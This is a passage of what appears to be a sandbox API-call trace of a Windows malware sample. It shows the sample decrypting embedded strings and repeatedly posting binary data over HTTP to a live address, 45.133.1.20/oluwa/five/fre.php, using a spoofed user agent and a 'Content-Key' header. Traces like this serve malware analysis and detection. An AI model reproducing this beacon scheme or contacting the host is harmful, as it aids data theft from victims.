(s=0xa78, buf=0x6bb998*, len=159, flags=0) returned 159 [0285.564] GetProcessHeap () returned 0x6a0000 [0285.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0285.564] recv (in: s=0xa78, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0285.623] GetProcessHeap () returned 0x6a0000 [0285.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0285.625] GetProcessHeap () returned 0x6a0000 [0285.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0285.626] GetProcessHeap () returned 0x6a0000 [0285.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba6b0 | out: hHeap=0x6a0000) returned 1 [0285.626] GetProcessHeap () returned 0x6a0000 [0285.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0285.627] closesocket (s=0xa78) returned 0 [0285.627] GetProcessHeap () returned 0x6a0000 [0285.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0285.627] GetProcessHeap () returned 0x6a0000 [0285.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.628] GetProcessHeap () returned 0x6a0000 [0285.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0285.628] GetProcessHeap () returned 0x6a0000 [0285.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0285.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x35c) returned 0xa78 [0285.631] Sleep (dwMilliseconds=0xea60) [0285.632] GetProcessHeap () returned 0x6a0000 [0285.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0285.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.634] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0285.648] GetProcessHeap () returned 0x6a0000 [0285.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d93a8 [0285.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.651] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6d93a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0285.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.652] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.653] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.653] GetProcessHeap () returned 0x6a0000 [0285.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d93a8 | out: hHeap=0x6a0000) returned 1 [0285.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.655] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0285.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.656] CryptDestroyKey (hKey=0x6ad020) returned 1 [0285.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.657] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0285.658] GetProcessHeap () returned 0x6a0000 [0285.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.659] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.665] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.666] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.667] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.667] GetProcessHeap () returned 0x6a0000 [0285.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0285.667] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.668] GetProcessHeap () returned 0x6a0000 [0285.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0285.669] GetProcessHeap () returned 0x6a0000 [0285.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.670] GetProcessHeap () returned 0x6a0000 [0285.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0285.671] GetProcessHeap () returned 0x6a0000 [0285.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0285.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.679] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0285.688] GetProcessHeap () returned 0x6a0000 [0285.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0285.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.689] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0285.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.690] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.692] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.692] GetProcessHeap () returned 0x6a0000 [0285.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0285.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.694] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0285.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.695] CryptDestroyKey (hKey=0x6ad020) returned 1 [0285.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.722] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0285.722] GetProcessHeap () returned 0x6a0000 [0285.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0285.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0285.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.726] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0285.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.728] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0285.728] GetProcessHeap () returned 0x6a0000 [0285.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0285.728] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0285.728] GetProcessHeap () returned 0x6a0000 [0285.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0285.728] socket (af=2, type=1, protocol=6) returned 0xa7c [0285.729] connect (s=0xa7c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0285.752] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0285.752] GetProcessHeap () returned 0x6a0000 [0285.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0285.752] GetProcessHeap () returned 0x6a0000 [0285.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0285.753] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.753] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.753] GetProcessHeap () returned 0x6a0000 [0285.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ff0 [0285.754] GetProcessHeap () returned 0x6a0000 [0285.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0285.754] GetProcessHeap () returned 0x6a0000 [0285.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0285.754] GetProcessHeap () returned 0x6a0000 [0285.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0285.755] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.756] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.756] GetProcessHeap () returned 0x6a0000 [0285.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0285.756] GetProcessHeap () returned 0x6a0000 [0285.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0285.758] send (s=0xa7c, buf=0x6bd460*, len=242, flags=0) returned 242 [0285.758] send (s=0xa7c, buf=0x6bb998*, len=159, flags=0) returned 159 [0285.758] GetProcessHeap () returned 0x6a0000 [0285.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0285.758] recv (in: s=0xa7c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0285.828] GetProcessHeap () returned 0x6a0000 [0285.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0285.829] GetProcessHeap () returned 0x6a0000 [0285.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0285.829] GetProcessHeap () returned 0x6a0000 [0285.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ff0 | out: hHeap=0x6a0000) returned 1 [0285.830] GetProcessHeap () returned 0x6a0000 [0285.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0285.831] closesocket (s=0xa7c) returned 0 [0285.831] GetProcessHeap () returned 0x6a0000 [0285.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0285.831] GetProcessHeap () returned 0x6a0000 [0285.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.832] GetProcessHeap () returned 0x6a0000 [0285.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0285.833] GetProcessHeap () returned 0x6a0000 [0285.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0285.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbb0) returned 0xa7c [0285.837] Sleep (dwMilliseconds=0xea60) [0285.839] GetProcessHeap () returned 0x6a0000 [0285.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0285.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0285.869] GetProcessHeap () returned 0x6a0000 [0285.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dcb20 [0285.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.873] CryptImportKey (in: hProv=0x6bed28, pbData=0x6dcb20, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0285.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.874] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.879] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.879] GetProcessHeap () returned 0x6a0000 [0285.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcb20 | out: hHeap=0x6a0000) returned 1 [0285.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.881] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0285.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.882] CryptDestroyKey (hKey=0x6ad020) returned 1 [0285.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.884] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0285.884] GetProcessHeap () returned 0x6a0000 [0285.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.885] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.888] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.890] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.890] GetProcessHeap () returned 0x6a0000 [0285.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0285.890] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.890] GetProcessHeap () returned 0x6a0000 [0285.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0285.892] GetProcessHeap () returned 0x6a0000 [0285.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.896] GetProcessHeap () returned 0x6a0000 [0285.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0285.897] GetProcessHeap () returned 0x6a0000 [0285.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0285.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0285.921] GetProcessHeap () returned 0x6a0000 [0285.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0285.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.923] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0285.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.924] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.925] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.925] GetProcessHeap () returned 0x6a0000 [0285.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0285.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.929] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0285.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.931] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0285.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.932] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0285.932] GetProcessHeap () returned 0x6a0000 [0285.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.933] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0285.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.934] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0285.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0285.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.940] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0285.940] GetProcessHeap () returned 0x6a0000 [0285.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0285.940] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0285.940] GetProcessHeap () returned 0x6a0000 [0285.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0285.940] socket (af=2, type=1, protocol=6) returned 0xa80 [0285.943] connect (s=0xa80, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0285.971] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0285.971] GetProcessHeap () returned 0x6a0000 [0285.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0285.971] GetProcessHeap () returned 0x6a0000 [0285.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0285.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.973] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.973] GetProcessHeap () returned 0x6a0000 [0285.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0285.973] GetProcessHeap () returned 0x6a0000 [0285.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0285.974] GetProcessHeap () returned 0x6a0000 [0285.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0285.974] GetProcessHeap () returned 0x6a0000 [0285.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0285.975] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.976] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.976] GetProcessHeap () returned 0x6a0000 [0285.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0285.976] GetProcessHeap () returned 0x6a0000 [0285.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0285.976] send (s=0xa80, buf=0x6bd460*, len=242, flags=0) returned 242 [0285.977] send (s=0xa80, buf=0x6bb998*, len=159, flags=0) returned 159 [0285.977] GetProcessHeap () returned 0x6a0000 [0285.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0285.977] recv (in: s=0xa80, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0286.060] GetProcessHeap () returned 0x6a0000 [0286.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0286.061] GetProcessHeap () returned 0x6a0000 [0286.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0286.062] GetProcessHeap () returned 0x6a0000 [0286.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0286.063] GetProcessHeap () returned 0x6a0000 [0286.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | 